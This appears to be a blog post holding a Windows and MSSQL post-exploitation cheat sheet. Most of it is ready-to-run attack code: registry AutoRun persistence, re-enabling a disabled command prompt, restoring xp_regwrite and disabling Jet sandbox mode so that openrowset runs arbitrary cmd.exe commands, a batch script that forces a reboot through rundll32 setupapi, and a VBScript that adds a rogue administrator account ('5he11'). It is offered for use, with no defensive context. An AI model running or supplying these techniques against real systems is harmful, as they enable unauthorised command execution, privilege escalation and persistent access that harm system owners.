set a Auto-Exec script when shell open
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\AutoRun
the connection history of MSTSC
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
When Shell or Regedit are disabled
GPEDIT.MSC进入组策略编辑器>用户配置>管理模板>系统>阻止访问命令提示符策略,将其设定为未配置
reg FSO
RegSvr32 C:\WINNT\SYSTEM32\scrrun.dll /s
execute command with xp_regwrite only
select @@version
--check the version of this MSSQL database server first
dbcc addextendedproc ("xp_regwrite","xpstar.dll")
--restore xp_rewrite by using xpstar.dll if it does not exist
--MSSQL 2005 should use xpstar90.dll
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
--write to reg
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd.exe /c YOUR COMMAND HERE")')
restart windows:
echo @ECHO OFF ^& cd/d %temp% ^& echo [version] ^> {out}.inf>a.bat
echo (set inf=InstallHinfSection DefaultInstall)>>a.bat
echo echo signature=$chicago$ ^>^> {out}.inf>>a.bat
echo echo [defaultinstall] ^>^> {out}.inf>>a.bat
echo rundll32 setupapi,%inf% 1 %temp%\{out}.inf>>a.bat
a.bat
Add administrator user account without net1.exe
echo dim username,password:If Wscript.Arguments.Count > 0 Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="5he11":password="123456":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"^&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os^&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os^&"/"^&username^&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath >cz.vbs
cscript cz.vbs
del cz.vbs
change the password of SA in MSSQL database server by using SQL command
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment